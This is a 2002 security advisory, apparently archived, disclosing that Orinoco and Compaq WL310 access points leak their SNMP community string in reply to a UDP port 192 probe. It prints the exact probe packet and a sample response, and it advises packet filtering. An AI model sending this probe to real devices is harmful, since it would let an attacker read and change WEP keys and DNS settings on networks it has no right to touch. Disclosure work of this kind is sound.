12th Aug 2002 [SBWID-5624]
COMMAND
Orinoco remote snmp vulnerability premits to see and change
configuration
SYSTEMS AFFECTED
Compaq WL310 (OEM Orinoco Residential Gateway)
PROBLEM
Per Foundstone Labs Advisory - 080902-APIL :
Advisory Name: Information Leakage in Orinoco and Compaq Access Points
Release Date: August 9th, 2002
Application: Orinoco Residential Gateway and Compaq WL310
Platforms: N/A
Severity: The ability to display/modify configuration information
Vendors: Orinoco (http://www.orinocowireless.com) and
Compaq (http://www.compaq.com)
Authors: Marshall Beddoe (marshall.beddoe@foundstone.com)
Tony Bettini (tony.bettini@foundstone.com)
CVE Candidate: CAN-2002-0812
Reference: http://www.foundstone.com/advisories
Overview:
An information leakage vulnerability exists in Orinoco and Compaq OEM
access points, disclosing the unique SNMP community string. As a
result,
an attacker can query the community string and gain the ability to
change system configuration including Wired Equivalent Privacy (WEP)
keys and Domain Name Service (DNS) information.
Detailed Description:
The Compaq WL310 is an OEM Orinoco Residential Gateway access point.
Both the Compaq and Orinoco access points use a unique identification
number found on the bottom of the access point for configuration
through their management client. This identification string is used as
the default SNMP read/write community string. The community strings
appears to be unchangable, unique, and not easily guessable. By sending
a specific packet to UDP port 192, the access point will return
information including the firmware version and the unique
identification value. The packet returned includes the value of
system.sysName.0, which in the case of the Compaq WL310 and Orinoco
Residential Gateway, includes the unique identification value. The
identification value can then be used as the SNMP community string to
view and modify the configuration.
The probe packet:
"\x01\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Example probe response:
01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 00 00 00 00 60 1d 20 2e 38 00 00 18 19 10 f8 | .....`. .8......
4f 52 69 4e 4f 43 4f 20 52 47 2d 31 31 30 30 20 | ORiNOCO RG-1100
30 33 39 32 61 30 00 00 00 00 00 00 00 00 00 00 | 0392a0..........
02 8f 24 02 52 47 2d 31 31 30 30 20 56 33 2e 38 | ..$.RG-1100 V3.8
33 20 53 4e 2d 30 32 55 54 30 38 32 33 32 33 34 | 3 SN-02UT0823234
32 20 56 00 | 2 V.
system.sysName.0 = "ORiNOCO RG-1100 0392a0"
Community name: 0392a0
Vendor Response:
Both vendors were notified of this issue on July 8th, 2002. According
to Orinoco, "The Residential Gateway line has been discontinued."
SOLUTION
Solution:
Employ packet filtering on inbound requests to deny access to ports
192/udp and 161/udp on the access point.
FoundScan has been updated to check for this vulnerability. For more
information on FoundScan, see the Foundstone website:
http://www.foundstone.com
Disclaimer:
The information contained in this advisory is copyright (c) 2002
Foundstone, Inc. and is believed to be accurate at the time of
publishing, but no representation of any warranty is given,
express, or implied as to its accuracy or completeness. In no
event shall the author or Foundstone be liable for any direct,
indirect, incidental, special, exemplary or consequential
damages resulting from the use or misuse of this information.
This advisory may be redistributed, provided that no fee is
assigned and that the advisory is not modified in any way.
-Also-
You might consider configuring the Gateway to remove snmp alltogether ...
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH